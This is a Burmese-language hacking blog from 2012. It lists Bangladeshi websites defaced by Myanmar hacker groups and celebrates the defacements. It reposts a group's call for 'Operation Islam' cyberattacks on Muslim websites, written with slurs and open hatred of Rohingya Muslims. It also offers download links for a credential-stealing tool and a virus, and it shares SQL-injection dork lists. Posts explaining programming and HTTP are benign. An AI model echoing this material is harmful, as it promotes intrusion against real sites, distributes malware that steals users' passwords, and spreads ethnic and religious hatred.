Sunday, June 17, 2012

List of BD Site Defaced in June 17

 
 
ေနာက္ထပ္ရထားတာပါ.......BD ဆိုက္ေတြေတာ္ေတာ္ 
ဗ်င္းခံလိုက္ရပါတယ္....၀မ္းသာစရာေပါ့ဗ်ာ......။
ဒီအတြက္ ေဘာ္ဒါၾကီး ဂ်ိမ္းစဘြန္းနဲ႕ mmcyberdevils.com 
ကို ခရက္တစ္ေပးပါတယ္...ေက်းဇူးလဲတင္ပါတယ္...။
 
Ref: http://mmcyberdevils.com/index.php?/topic/210-list-of-bd-site-defaced-in-june-17/
 
 
 
http://www.buildingforfutureltd.com/
http://zone-hack.com/mirror/id/62344
http://www.bhdlbd.com/
http://zone-hack.com/mirror/id/62345
http://idagms.com/
http://zone-hack.com/mirror/id/62346
http://shellrealtors.com/
http://zone-hack.com/mirror/id/62347
http://zahragroupbd.com/
http://zone-hack.com/mirror/id/62348
http://blf-bd.org/
http://zone-hack.com/mirror/id/62349
http://www.mothertel.com/
http://zone-hack.com/mirror/id/62350
http://www.uncangemas.com/
http://zone-hack.com/mirror/id/62351
http://www.tauhid-edu.com
http://zone-hack.com/mirror/id/62352
http://www.panaceabd.net/
http://zone-hack.com/mirror/id/62353
http://unitextrade.com/
http://zone-hack.com/mirror/id/62354
http://www.tempelats4you.com/
http://zone-hack.com/mirror/id/62356
http://tarokakantho.com/
http://zone-hack.com/mirror/id/62357
http://ehsananinda.com
http://zone-hack.com/mirror/id/62358
http://suprobhat.com/
http://zone-hack.com/mirror/id/62359
http://hossaingroup.com/
 
http://zone-hack.com/mirror/id/62359 စေသာလင့္မ်ား
မွာ Mirror လင့္မ်ားျဖစ္ၾကပါသည္...။ 
 
ေနာက္ထပ္သတင္းမ်ားရလွ်င္ရခ်င္းတင္ျပေပးသြားမည္... 
Read More ->>

Tuesday, June 12, 2012

Android Application Testing Guide


ကၽြန္ေတာ္ကေတာင္းဆိုလို႕ ကိုထုတ္ေကာက္ရွာေပးထားတဲ့ဟာပါ.........။ကအစတုန္းက ညီေတာ္ေမာင္
တစ္ေယာက္အတြက္ လုပ္ေပးထားတာ ဒါေပမယ္လူတိုင္း ဖတ္ႏိုင္ေအာင္ တင္ေပး လိုက္တာ.......။

Thank To Dongoth............

Overview of Android Application Testing Guide
  • The first and only book that focuses on testing Android applications
  • Step-by-step approach clearly explaining the most efficient testing methodologies
  • Real world examples with practical test cases that you can reuse
http://www.mediafire.com/?ddv0n51n7815kx7
Read More ->>

BD Sites Are Hacked By Myanmar Hackers



ရခိုင္ျပည္နယ္တြင္ျဖစ္ ပြားေနေသာ....ရိုဟင္ဂါ ကုလားမ်ားႏွင့္ ျမန္မာတိုင္းရင္သားရခိုင္လူမ်ိဳးမ်ားတို႕၏
အေရးအခင္းတြင္ တစ္ႏိုင္ငံလံုးမွ ျမန္မာတိုင္ရင္းသားမ်ား ေသြးစည္းခဲ့ၾကပါသည္....။
ထို႕အျပင္ ျမန္မာ ႏိုင္ငံမွ Hacker မ်ားကလဲစုေပါင္းတိုက္ ခိုက္ျခင္းမ်ားျပဳလုပ္ခဲ့ၾကပါတယ္.....။

BHG (blink hacker group) မွ လည္းတိုက္ခဲ့သည့္အျပင္........တျခားနာမည္ၾကီးအဖဲြ႕ အစည္းမ်ား ...မွ
Hacker မ်ားကလဲ တိုက္ခိုက္လွ်က္ရိွပါတယ္.....။ေအာက္ေဖာ္ျပပါဆိုက္မ်ားသည္..................။MCD
(Myanmar Cyber Devils) မွေဖာ္ျပထားသည့္ Defacing ျပဳလုပ္ထားျပီးျဖစ္ေသာ.....ဘဂၤလီဆိုက္မ်ားျဖစ္
ၾကပါသည္............။

http://csc.edu.bd/
http://muzmatch.com/index.htm/
http://www.amadermedia.com.bd/
http://news-365.com/

ေနာက္မ်ားမွာလဲသတင္းထပ္ရလွ်င္ရျခင္းတင္ျပေပးသြားမွာပါ...............။

ေက်းဇူးတင္ပါတယ္.............။
Read More ->>

Saturday, June 9, 2012

recycler virus Kill3R


cyber coder ဆီကမလာတာ သူကတကယ္မိုက္တယ္လို႕ရည္ညႊန္းထားတယ္...recycler virus ဆိုတာလူတိုင္း လလက္ေပါက္ကပ္ေအာင္ စြမ္းေဆာင္ႏိုင္ခဲ့တာပါ...။သတ္မရ ျဖတ္မရနဲ႕ ေလ...။
ကၽြန္ေတာ္ကလဲ အဆင္သင့္တုန္းေလးျပန္လည္ေ၀မွ်လိုက္ပါတယ္...။
အဆင္ေျပႏိုင္ပါေစလို႕ဆုေတာင္းေပးလိုက္ပါတယ္....။

Download Here
Read More ->>

HC Stealer



Steal:
• Firefox
• Internet Explorerw!
• Google Chorme
• MSN Messenger / Live Messenger
• Yahoo Messenger
• Yahoo ETS
• Pidgin / Gaim
• No-Ip
• DynDNS
• FileZilla
• CD Keys
and much more..
credit:HC

Visrus scan:
https://www.virustot...e4b78/analysis/

Download here:
http://www.mediafire...zeph909sv69qzh7

enjoy... :)

တကယ္သံုးမယ္ဆိုရင္ေတာ့ update ၿဖစ္တဲ့ anti-V တစ္ခုခုနဲ ့ထပ္ၿပီးေတာ့ scan ၾကည့္ဖို ့ေတာ့ မေမ့ နဲ့ေနာ္ .. (in our world, we must trust 'nothing') :lol:

Post by Ko BiG BOss
Read More ->>

Friday, June 8, 2012

What is Programming?



အရမ္းအသံုး၀င္လို႕တင္ေပးလိုက္တာပါ..။ဒီလို ကြာလတီပိုစ့္ေတြကိုထံုး စံအတိုင္း နက္ေဂးတစ္သန္ဒါ
(သို႕) ghostarea.net မွ ေရးသားတာျဖစ္ပါတယ္...ေသျခာဖတ္ၾကည့္ပါ တကယ္ေကာင္းမြန္ျပီးေတာ့
နည္းပညာနဲ႕ ေတြးေခၚပညာကိုဆက္စပ္ျပသြားတာပါ...။

Programming ကို ခက္တယ္.. မရဘူးခ်ည္းၾကားၾကားေနရပါတယ္..။ ကၽြန္ေတာ္ကိုယ္တိုင္လည္း ဒီျပႆနာနဲ႔ ၾကံဳေတြ ႔ခဲ့ရဖူးပါတယ္.။ ဒါေပမယ့္
Hacking:The art of exploration စာအုပ္ထဲက What is Programming ဆိုတဲ့ ေဆာင္းပါးကို ဖတ္ျပီးကတည္းက Programming ကို မေၾကာက္ဘဲ
ၾကိဳက္သြားခဲ့ပါတယ္..။ဒီလို အခက္အခဲရွိသူေတြအတြက္ ကၽြန္ေတာ္ အဲ့ဒီ့ ေဆာင္းပါးကို ဆီေလ်ာ္ေအာင္ ဘာသာျပန္ေပးလိုက္ပါတယ္..။
What is Programming.?
တကယ္ေတာ့ Programming ဆိုေတာ့ Philosophy  လိုပဲဗ်..။ သေဘာတရားေတြေပၚ အေျခခံထားတဲ့ Concept တစ္ခုပဲ..။ လမ္းညႊန္ခ်က္ေတြ
ပါတဲ့ Statement Series တစ္ခုထက္ဘာမွမပိုဘူး..စဥ္းစားၾကည့္ ဘယ္ Programm ပဲျဖစ္ျဖစ္ Statement ေတြ Instruction ေတြ စီထားတဲ့ Series
ၾကီးပဲ…သူ ႔ကို သတ္မွတ္ထားတဲ့ သီးသန္႔  Language တစ္ခုနဲ႔ ေရးထားတာပဲ ပိုတယ္..။တကယ္ေတာ့ Programming သေဘာတရားေတြကို
ကၽြန္ေတာ္တို႔ ေန႔တိုင္းလုပ္ေနတဲ့ အလုပ္ေတြမွာ လည္းပါတယ္ဗ်…ဟမ္..ေၾကာင္သြားတာလား အဟုတ္ဗ်…မယံုမရွိနဲ႔ ထမင္းခ်က္တဲ့ေနရာမွာလည္း ပါတယ္
ကားေမာင္းတဲ့ေနရာမွာလည္းပါတယ္..မနက္လင္းလို႔ သြားတိုက္တာက အစ အိပ္ရာ၀င္တဲ့အထိ Programming သေဘာတရားေတြနဲ႔ မကင္းဘူးဗ်
ဥပမာဗ်ာ.. ကၽြန္ေတာ့္က်ဴရွင္ အျပန္ အိမ္ကို ကားေမာင္းလာတယ္ အင္းးးးးးး ကၽြန္ေတာ့္အိမ္က ၂၆ လမ္း လမ္း ကိုးဆယ္မွာ ဆိုပါစို႔ဗ်ာ
၂၆ လမ္းတည့္တည့္ၾကီး ကၽြန္ေတာ္ေမာင္းလာတယ္..တိန္ ၈၆ နဲ႔ ၈၇ ၾကား လမ္းမွာ ေမာ္ေတာ္ပီကယ္ ဖမ္းေနတယ္ဗ် ဒါနဲ႔ ၈၅ လမ္းမွာ ညာေကြ ႔
လိုက္ရတယ္.. ၂၅ လမ္းမွာ ဘယ္ကိုျပန္႔ေကြ ႔တယ္ဗ်ာ ေရွ ႔က လမ္းခြဆံုဗ် ၈၈ လမ္းေလ ကၽြန္ေတာ္ဘယ္ေကြ႔ ၂၆ လမ္းေပၚျပန္တက္ျပီးတည့္တည့္သြားရင္လည္းအိမ္ေရာက္တယ္
ဒါမွ မဟုတ္ ၈၆ က်မွ ညာေကြ ႔ ၂၆ ေပၚျပန္တက္လည္း ရတယ္ဗ်
. ဒီဥပမာဟာ Programm တစ္ပုဒ္ပဲ..သူလည္း Statement Series ပဲေလ..ဟုတ္ဖူးလား..ဒါေပမယ့္ ကြန္ပ်ဳတာကို ဒီလိုၾကီး သြားေျပာလို႔
မရဘူး ကြန္ပ်ဳတာက ဒီတိုင္းၾကီး နားလည္တာဟုတ္ဖူး သူနားလည္တာက 0 နဲ႔ 1 ေတြပဲ ပါတဲ့ Machine Language ပဲေလ..ခက္တာက Machine
Language နဲ႔ Programm တစ္ပုဒ္ေရးရင္ ဘယ္ အဆင္ေျပမလဲဗ် 0 ေတြ 1 ေတြနဲ႔ ရူးသြားမွာေပါ့..ေနာ့ ဒီေတာ့ Machine Language နဲ႔ လူနားလည္တဲ့
Language ၾကားမွာ ခ်ိတ္ဆက္ေပးဖို႔ ဘာသာျပန္တစ္ခု လိုလာျပီ… အိႏၵိယက ကုလားၾကီးနဲ႔ တရုတ္ ၾကီး တို႔ စကား၀ုိင္းမွာ စကားျပန္လိုသလိုေပါ့
Programmer နဲ႔ Computer ၾကားမွာ ဘာသာျပန္လိုလာပါျပီ ဥပမာ assembler ဆိုပါစို႔ assembler ဆိုတာ Assembly Language ကေန Machine
Language ကို ဘာသာျပန္ေပးတဲ့ Translator တစ္ခုပါပဲ..Assembly Language ဟာ Machine Language ေလာက္ မရႈပ္ေထြးေတာ့ပါဘူး
သူဟာ Instruction ေတြ Variable ေတြကို စာလံုးေတြနဲ႔ အသံုးျပဳႏုိင္ပါျပီ ဒါေပသိ သူဟာ ျပီးျပည့္စံုတဲ့ Language လို႔ေျပာလို႔မရပါဘူး ဘာေၾကာင့္လဲဆိုေတာ့
architecture-specific ျဖစ္ေနတံုးပါပဲ သေဘာကေတာ.Intel x86 processors မွာ နားလည္တဲ့ Machine Language နဲ႔
Sparc processors, x86 မွာ နားလည္တဲ့ Machine Language နဲ႔ ကမတူပါဘူး..ဒီေတာ့ Intel x86 မွာ Assemble နဲ႔ ေရးတဲ့ Programm တစ္ပုဒ္ကို
Sparc Processors,x86 မွာ Run ႏိုင္ဖုိ႔ ေနာက္တစ္မ်ိဳးျပန္ေရးရပါသတဲ့..( စိတ္ေလပ…ေနာ္ ) ဒီေတာ့ဗ်ာ Programm ေကာင္းေကာင္း တစ္ပုဒ္ေရးဖို႔
အေရး Processer အေၾကာင္း အေသးစိတ္ကိုသိမွ ျဖစ္မွာ မုိ႔လားဗ်
ဒီျပႆနာေတြကို ေျဖရွင္းဖို႔ Compiler ေတြ ေပၚလာပါတယ္…ဒန္႕  မင္းသား လာျပီကြ Compiler ဆိုတာ လည္း Translator ပါပဲ သူက တျခား
တမ်ိဳးေပါ့ Super Translator ဆိုပါစို႔ ဟဲ…။ Compiler ဆိုတာ High-level Programming Language ေတြကို Machine Language ကို ေျပာင္းေပးတဲ့
Translator ပါပဲ. သူဟာ Assembler ထက္ ပိုမို ေခ်ာေမြ ႔ျပီး မတူညီတဲ့ Processor မ်ိဳးစံုေပၚမွာ Translate လုပ္ႏိုင္ပါတယ္..။ သေဘာကေတာ့ဗ်ာ High-level
Programming နဲ႔ ေရးထားတဲ့ Programme တစ္ပုဒ္ဟာ တခါေရးရံုနဲ႔ စက္တိုင္းမွာ Run ႏိုင္တယ္ ေပါ့ဗ်ာ low level ေတြကို ထပ္ခါထပ္ခါမေရးရေတာ့ သက္သာတာေပါ့
ျပီးေတာ့ High Level Language နဲ႔ ေရးတဲ့ Programm တစ္ပုဒ္ဟာပိုျပီး ဖတ္ရလြယ္တယ္ဗ် Low-level တို႔ Machine Langugae တို႔ထက္..ပိုျပီး ဖတ္ရလြယ္
ပါတယ္..။ ဒါေပမယ့္ သူ ႔ဟာ အလြန္တင္းၾကပ္တိက်တဲ့ စည္းမ်ဥ္းေတြေပၚမွာ အေျခခံျပီး ေရးရတဲ့အတြက္ သတိအရမ္းထားရပါတယ္..။
Programming မွာ အရမ္းအေရးၾကီး တဲ့ အရာတစ္မ်ိဳးကေတာ့ Pseudo-Code လို႔ေခၚတဲ့ ပံုစံတစ္မ်ိဳးပါ Pseudo-Code ဆိုတာ Programming Language
ထဲမွာပါတဲ့ ရိုးရိုး English စာလံုးေလးေတြနဲ႔ ဖြဲ ႔စည္းထားတဲ့ Form တစ္မ်ိဳးပဲျဖစ္ပါတယ္..။ Pseudo-Code ကို ဘယ္ Compiler ကမွ နားမလည္ပါဘူး ဘယ္ကြန္ပ်ဳတာ
ကမွလည္း နားမလည္ပါဘူး ဒါေပမယ့္ Programmer တိုင္းအတြက္ မရွိမျဖစ္ပါ… ဘာလို႔လဲဆိုေတာ့ Programming Language နဲ႔ English လို လူ ႔ဘာသာ စကားကို
ဆက္သြယ္ေပးထားတဲ့ တံတားတစ္စင္းျဖစ္လို႔ပါပဲ…ဥပမာဗ်ာ ခုနက ကားေမာင္းတဲ့အေၾကာင္းအရာကို Programme တစ္ပုဒ္လိုေရးၾကည့္ရေအာင္
Begin going east on 26
Until ( I arrived my home )
{
Drive down 26
}
If ( street is blocked by polices )
{
Turn (right,85);
Turn(left,25);
Turn(left,87);
}
else
{
Turn(right,86);
Turn(left,25);
Turn(left,87)
}
Turn (right,27)
For (3 iterations)
{
Drive straight for 3 roads
}
Stop at my Home
အထက္က Instruction ေတြကို ေသခ်ာၾကည့္လိုက္ပါ တစ္ေၾကာင္းခ်င္းေရးတယ္ တိက်ေသခ်ာတဲ့ Direction ေတြပါတယ္ Loggic က်က် Control Structure ေတြပါတယ္
Control Structure ေတြသာမပါရင္ ဟိုး ေရွ ႔ကလို စာပုိဒ္ၾကီးပဲ ေပါ့ ဘာမွမထူးပါဘူး  ကဲ ဒီလိုဆို နည္းနည္းေတာ့ Programming ဆိုတာကို ေပါက္ေလာက္ျပီ မခက္ဘူးေနာ္
ဒီေလာက္နားလည္ရင္ကို Programming ကိုမေၾကာက္ေတာ့ဘူး ကဲ ဆက္ရဦးမယ္…။
ခုနက Driving to Home Program ေလးမွာ Turn(right,26) တို႔ Turn(left,) တို႔ပါတာ ေတြ ႔မွာပါ Turn ဆိုတဲ့စကားလံုး တစ္လံုးထဲကို ခြဲၾကည့္ရင္…
၁.ေကြ ႔မယ့္လမ္းမွာ အရွိန္ေလးေလွ်ာ့မယ္
၂.ကားေခါင္းေလး အသာေလး၀ိုက္မယ္
၃. Steering (စတီယာတိုင္ေပါ့ဗ်ာ အမေလး လွ်ာယားလိုက္တာ) ကို လွည့္မယ္
၄. ေကြ ႔ျပီးတာနဲ႔ အရွိန္ျပန္တင္မယ္
ဘယ္လမ္းမွာမဆိုေနာ္ ေကြ ႔ဖို႔ အတြက္ ဒီ နည္းစနစ္တစ္မ်ိဳးထဲသံုးတာ..ဒီလို အခါမ်ိဳးမွာ Function လို႔ သံုးႏႈန္းႏုိင္ပါျပီ Turn Function ေပါ့ဗ်ာ ဒီ Turn Function နဲ႔ ဘယ္
ကားမဆို ဘယ္လမ္းမဆို ေကြ ႔လို႔ရပါတယ္ မယံုရင္ ေကြ ႔ၾကည့္ အဲ တြန္းျပီး ေကြ ႔တာေတာ့ ပါဘူးေနာ္ ဟီး Function ဆိုတာ argument ေတြ စုစည္းထားတာပဲျဖစ္ပါတယ္
ကဲ ခုနက Turn Function ကို Program ပံုစံ Pseudo-code ေတြထဲမွာ ထည့္ၾကည့္ရေအာင္
Function Turn(the_direction, the_street)
{
locate the_street;
slow down;
if(the_direction == right)
{
turn on the right blinker;
turn the steering wheel to the right;
}
else
{
turn on the left blinker;
turn the steering wheel to the left;
}
speed back up
}
ကဲ မလြယ္ဘူးလား ဘာလဲဟဲ ေလာကဓံမဟုတ္ဘူး ဘာလဲဟဲ့ Programming လို႔ေတာင္ ေအာ္လို႔ ရျပီ ဟီး ဟီး Function ေတြကို အသံုးျပဳရျခင္းက ဒါပါပဲ Turn ေနရာမွာ
ဒီလို အရွည္ၾကီး ေရးစရာမလိုပဲ Turn လို႔ပဲေရးပဲ ေခၚသံုးခြင့္ရွိတာေပါ့ဗ်ာ
Function ေတြနဲ႔ ပတ္သတ္ျပီး အေရးၾကီးတဲ့အေၾကာင္းအရာကေတာ့ Function တစ္ခုခ်င္းဆီမွာ သီးသန္႔ အေၾကာင္းအရာေတြရွိပါတယ္. သေဘာကေတာ့ဗ်ာ
သီးသန္႔ Local Variable ေတြ အတြက္ သီးသန္႔ Function တစ္ခုစီရွိတယ္ေပါ့ဗ်ာ သီးသန္႔ environment လို႔လည္းေျပာလို႔ရတယ္ဗ် Program တစ္ပုဒ္ရဲ ႔အသက္ဟာ
Function လို႔ ေျပာလို႔ရပါတယ္ ဘယ္ Program မွ Function မပါတဲ့ Program မရွိပါဘူး Main Function က ခြဲထြက္တဲ့ Function ေတြ Main Function ေအာက္က
Function ေတြ…Function တစ္ခုက ခြဲထြက္တဲ့ Function ေတြနဲ႔ ဖြဲ ႔စည္းထားတာပါ
ကဲ ဒါဆို Programming သေဘာ တရားကိ ုနည္းနည္းေတာ့ေပါက္သြားေလာက္ပါျပီ  Programming ေဆာင္းပါးဆိုေတာ့ ဖတ္တဲ့လူပ်င္းမွာလည္းဆိုးလို႔ ဗရုတ္သုတ္ခေလး
ေတြလည္း ထည့္ေရးေပးထားပါတယ္ ကၽြန္ေတာ္ ေနာက္က်ရင္ Programming ရဲ ႔ အဓိက Concept ေတြကိုခ်ည္း သီးသန္႔ေလးေရးေပးပါဦးမယ္ ေစာင့္ဖတ္ၾကပါဦး
Read More ->>

BD vs IN --==-- Cyber War[Whole Story]



ကၽြန္ေတာ္တို႔ အရင္တုန္းက ေရပိုင္နက္ အေရးအခင္းနဲ႔ ပတ္သက္ျပီး Bangladesh ကို Operation တစ္ခုဆင္ႏြဲခဲ႔တာ အားလံုးလည္း မွတ္မိၾကဦးမွာပါ.....ကၽြန္ေတာ္ထင္ပါတယ္....အဲတုန္းက ခ် ဆိုလို႔သာ ၀ိုင္းခ်ၾကတယ္... Bangladesh ဘာလဲ ဆိုတာ ေရေရရာရာ မသိခဲ႔ၾကတဲ႔လူက မ်ားမွာပါ.....
ကၽြန္ေတာ္ထင္ေနပါတယ္.....တစ္ခ်ိန္မဟုတ္ တစ္ခ်ိန္ေတာ႔ BD ေတြနဲ႔ တစ္ပြဲတစ္လမ္းေတာ႔ ထပ္ဆြဲရဦးမယ္ လို႔.....ဘယ္ေတာ႔လဲ သာ ေျပာလို႔မရတာ....
ခုျပည္တြင္းမွာလည္း BD အႏြယ္၀င္ေတြျဖစ္တဲ႔ ရိုဟင္ဂ်ာ မြတ္စလင္ ကုလားေတြ နဲ႔လည္း အေျခအေနေတြ ရႈပ္ေထြးေနေတာ..... ????

ထားပါေလ ...
စစ္ပြဲတစ္ပြဲမွာ ရန္သူအေၾကာင္းၾကိဳသိထားျခင္းသည္လည္း စစ္ပြဲေအာင္ႏိူင္ရာ အေထာက္အကူပါပဲ...ကဲ...နာမည္ေက်ာ္ Cyber War တစ္ခုျဖစ္တဲ႔ BD vs IN Cyber War ကို ဒီ စာအုပ္ေလးကေနတစ္ဆင္႔ ေလ႔လာၾကည္႔ရေအာင္ဗ်ာ...
ရန္သူေပမယ္႔လည္း ကၽြန္ေတာ္တို႔ အေနနဲ႔ အတုယူစရာရွိရင္ အတုယူရပါမယ္....ဟုတ္တယ္ေနာ္....ခု ဒီစာအုပ္ေလးထဲမွာ...

  • ဘာေၾကာင္႔ Cyber War စျဖစ္ခဲ႔ရသလဲ ...
  • BCA / 3xp1re / BBHH နဲ႔ ICA / Indishell အျပန္အလွန္ တိုက္ခိုက္ပံု ..... DDos ကိုလည္း လက္နက္တစ္ခုလို အၾကီးအက်ယ္ သံုးစြဲခဲ႔တာကိုလည္း ေတြ႔ရပါတယ္ ...
  • ဒီ Cyber War ကာလအတြင္းမွာ BCA က သူတို႔ Bangladesh Website ေတြကို သူတို႔ရဲ႔ web security တိုးျမင္႔မို႔အတြက္ အသိေပးခ်က္ အသိေပးပံုေလး ကိုလည္း ဖတ္ရႈၾကရမွာပါ ...[ကဲ...ျမန္မာေတြေကာ ... ဘယ္လိုလဲ ...]


BCA ဘာေကာင္လဲ ဆိုတာ ေသခ်ာၾကည္႔ေနာ္.... ျဖစ္ျပီ ဆိုေတာ႔မွ Tuto ေတြေျပးရွာေနလို႔ကေတာ႔ မျဖစ္ေသး........


ခု ဒီစာအုပ္က Bangladesh ဖက္ ပင္းတဲ႔ Security-ray က ယူလာတာျဖစ္ပါတယ္
ကၽြန္ေတာ္ ေနာက္ကိုလည္း BD ေတြနဲ႔ပတ္သက္ျပီး သိသင္႔တယ္ ထင္တာေလးေတြကိုလည္း စုစည္းတင္ျပေပးသြားပါ႔မယ္....






Download Here


ref:http://mmcyberdevils.com/
ထေလာ႔ ... အို ျမန္မာ ...
Read More ->>

BHG Start Operation Islam



ကၽြန္ေတာ္ BHG ရဲ႕ ဆိုက္မွာတင္ထားတာကို ေဖၚျပလိုက္တာပါ...။ကၽြန္ေတာ္တို႕ ရခိုင္ မွာျဖစ္ေနတဲ့ ရိုဟင္ဂ်ာ
နဲ႕ ျမန္မာ ကိစၥ ေတြဟာ cyber space ေပၚ ေရာက္လာပါျပီ... ။ BHG က cyber war တစ္ခုစတင္ ေၾက ညာ
လိုက္ျခင္းျဖစ္ပါတယ္....ကၽြန္ေတာ့္အေနနဲ႕ လဲ ဒီကိစၥ အေပၚကို အျပည့္အ၀ ေထာက္ခံပါတယ္...။
အားေပးေနပါတယ္....။

BHG ရဲ႕ ေၾကညာခ်က္ကို ေအာက္မွာေဖၚျပထားပါတယ္...။

BHG အေနနဲ႕မိမိတို႔ အဖြဲ႕ ရဲ့ Black Hack သေဘာအတုိင္းရပ္တည္ခဲ့တာၾကာပါၿပီ… ၿမန္မာ အစိုး ရကိုလည္းတုိက္ခုိက္ခဲ့ ဖူးသလို လံုၿခံဳေရးအားနည္းတဲ့ၿမန္မာဆုိဒ္ေတြကိုလည္း တုိက္ခုိက္ခဲ့ဖူးတယ္.. မန္ဘာ တစ္ေယာက္ထည္းနဲ႔ဖြဲ႕စည္းထားတဲ့ အဖြဲ႕ မဟုတ္တဲ့အတြက္ စိတ္ၿမန္လက္ၿမန္ရွိတဲ့ မန္ဘာ တခ်ိဳ႕ေၾကာင့္လည္း တၿခား Online သံုးတဲ့ တၿခား ညီအကို ေတြ နဲ႔ စိတ္အေနွာက္အယွက္ျဖစ္ခဲ့ဖူးမယ္ စကားအေၿပာအဆုိ မတတ္တာေၾကာင့္ ရိုင္းတယ္ထင္ခံရဖူး ထင္ခံရမယ္.. .. BHG အေနနဲ႔ရပ္တည္ခဲ့တဲ့ 1st generation ကေန 2st generation ထိ ညီအကို အားလံုး က ကိုယ္ပိုင္ ခံယူ ခ်က္ရွိလို႔ မိမိတို႔ ရပ္တည္ ခဲ့တာ မွားတယ္ လို႕လည္းမဆုိသာၾကဘူး မွန္တယ္လည္း မဆုိသာၾကဘူး..
BHG ရယ္လို႔ စၿဖစ္လာထည္းက hacking ပိုင္းမွာ ဘယ္ေလာက္ေတာ္ေနအုန္းေတာ့ မူဆလင္ဆုိရင္ member အၿဖစ္လက္မခံ ခဲ့ ဘူး.. ဒီလိုပဲ မူဆလင္ေတြကို မုန္းတီးတယ္.. ခု မုန္းတီးတာထက္ဆုိး ၀ါးေနၿပီ.
က်ေနာ္တုိ႔ ေၿမမွာေနတယ္ က်ေနာ္တို႔ ေရကိုေသာက္တယ္.. က်ေနာ္တုိ႔ ပိုင္တဲ့ေၿမကိုလိုခ်င္တယ္.. က်ေနာ္တုိ႔ လူမ်ိဳးကိုေစာ္ကားတဲ့ ကုလားေတြ ကို ဒီတုိင္းလက္ပိုက္ ၾကည့္ေနရမွာ ကိုလည္း ၿမန္မာ ၿပီၿပိီ က်ေနာ္တုိ႔ အေနနဲ႔ လံုး၀မနွစ္မ်ိဳ ဘူး ..
အဓိက က်ေနာ္ေၿပာခ်င္တာက ..
မူဆလင္ ဆုိဒ္ေတြကို ဟက္မယ္ .. မည္သည့္ မူဆလင္ ဆုိဒ္ မဆုိ security အရတုိက္ခုိက္မယ္ cyber war စတင္ေၾကၿငာမယ္..
cyber war တစ္ခုၿဖစ္လာရင္ အဖြဲ႕တစ္ဖြဲ႕ထည္းအင္အားနဲ႔မလံုေလာက္ပါဘူး ..
ၿမန္မာဘက္က White Hacker ေတြေကာ မိမိတုိ႔ ဘက္ကိုကာကြယ္ဖို႔
ၿပန္လည္တုိက္ခုိက္ဖို႔ Black Hacker ေတြေကာ လိုအပ္ပါတယ္..
BHG ရယ္မဟုတ္ဘူး တၿခား မွာလည္းက်ေနာ္တုိ႔ ထက္ ေတာ္တဲ့ တတ္တဲ့ ညီအကိုေတြရွိတယ္..
သူတုိ႔ ေတြကေကာ
BHG ကို မုန္းလား
ဒါမွမဟုတ္ အမ်ိဳးဘာသာကိုနင္းေၿခေနတဲ့ မူဆလင္ေတြကိုမုန္းလား..
က်ေနာ္တုိ႔ အေနနဲ႔ Operation Islam ကို စတင္မွာပါ.. နည္းပညာကိုနားလည္တဲ့ ညီအကိုမ်ားအေနနဲ႔ တစ္နုိင္တစ္ပိုင္ islam ဆုိဒ္ေတြကို တုိက္ခုိက္ၾကပါ..
က်ေနာ္တု႔ိအဖြဲ႕ကို ေထာက္ခံ ဖို႔ ေၿပာတာလည္းမဟုတ္သလုိ ပါ၀င္ဖို႔ ေၿပာတာလည္းမဟုတ္ဘူး.. စိတ္ဓာတ္တူၿပီးခံယူခ်က္တူတဲ့ လူတုိင္းက ညီအကိုပဲ..
တုိင္းၿပည္ကို ခ်စ္တဲ့စိတ္နဲ႔ တစ္ေဒါင့္တစ္ေနရာ က လူမ်ိဳးေရးဘာသာေရးကို မိမိတို႔ တတ္ကြ်မ္းတဲ့ ဘက္က ပါ၀င္ေပးမဲ့ ညီအကိုတုိင္းကို လည္း က်ေနာ္ တို႕ရင္ထည္းမွာ မ်ိဳးခ်စ္ Cyber သူရဲေကာင္းရယ္လို႔ သတ္မွတ္ထားမွာပါ.. ..
=======================================================
WE ,BHG declare cyber war To Islamic site
We, Burmese Hacker are universal but we are loyal to the land we survived, we leant. We don’t want bloodshed created by the terrorists. Also, we do not stand for the evils, we are making peace by our means. If you’re born in Burma, and breathe the breeze of Burmese monsoon, we are the same, of course, we are Burmese. Join our operation.Thanks to everyone..

ref: blink hacker group
Read More ->>

Huge Dork Lists for SQL Injection



SQL injections အတြက္ ဆုေဆာင္းေပးထား တဲ့စာအုပ္ေလးတစ္အုပ္ပါ ထံုးစံအတိုင္း ethickiddie တင္ျပ
စုေဆာင္းေပးထားတာပါ...။ေအာက္ေဖၚျပပါ လင့္ကေနေဒါင္းလုပ္ဆဲြလိုက္ပါ...။
SQL injection ေလ့လာသူေတြအတြက္ အသံုး၀င္မွပါ....။

http://www.mediafire.com/?mjm7ta44h3559ib
Read More ->>

Tuesday, June 5, 2012

Introduction to HTTP Protocol



ဒီ post ေလးထဲမွာ HTTP Protocol အေၾကာင္းနည္းနည္းေလးေၿပာခ်င္ပါတယ္။

HTTP (Hyper Text Transfer Protocol) ဆိုတာ ကမၻာေပၚမွာအသံုးအမ်ားဆံုး protocol တခုပါ။ သူ.ကုိဘယ္ေနရာမွာ သံုးလဲဆုိေတာ့ ကြ်န္ေတာ္တုိ.ေန.တုိင္းသံုးေနၿမင္ေန ထိေတြ.ေနရတဲ. World Wide Web ၾကီးေပါ့ဗ်ာ။ကြ်န္ေတာ္တုိ. အေနနဲ.တကယ္လို. WWW ကုိသံုးေတာ့မယ္ဆုိရင္ မရိွမၿဖစ္လုိတဲ့အရာ ႏွစ္ခုရိွပါတယ္။ ပထမ တခုက browser ပါ။သူကေတာ့ client ေပါ့။ေနာက္တခုက ေတာ့ client ကုိ service ေပးမဲ့ server ေပါ့အဲဒါကေတာ့ web server ပါပဲ။ အသံုးမ်ားတဲ့ browser ေတြကေတာ့ firefox, Internet Explorer ေပါ့ဗ်ာ။ အသံုးမ်ားတဲ့ Web Server ေတြကေတာ့ IIS နဲ. Apache Web Server ေပါ့။ ကြ်န္ေတာ္တုိ.က ၾကိဳက္တဲ့ဆုိက္ကို ၾကိဳက္တဲ့ browser နဲ.ၾကည့္လို.ရတယ္ဗ်ာ။ အဲ web browser နဲ. အမ်ိဳးမ်ိဳးေသာ မတူညီတဲ့ Web Server ေတြဘယ္လုိဆက္သြယ္သလဲ အလုပ္လုပ္သလဲေပ့ါ။ အဲဒီမွာ မင္းသားၾကီးကေတာ့ HTTP protocol ေပါ့ဗ်ာ ။ Protocol ကုိၿမန္မာမွု.ၿပဳရင္ေတာ့ Client ကြန္ပ်ဳတာနဲ. Server ကြန္ပ်ဳတာၾကား နားလည္မွု.ယူထားတဲ့ လုိက္နာရမဲ့စည္းကမ္းေတြေပါ့။ ဟ ဘာစည္းကမ္းေတြတုံုးဆုိေတာ့ browser က server နဲ. Html ဖုိင္တခုကိုလိုခ်င္ရင္ 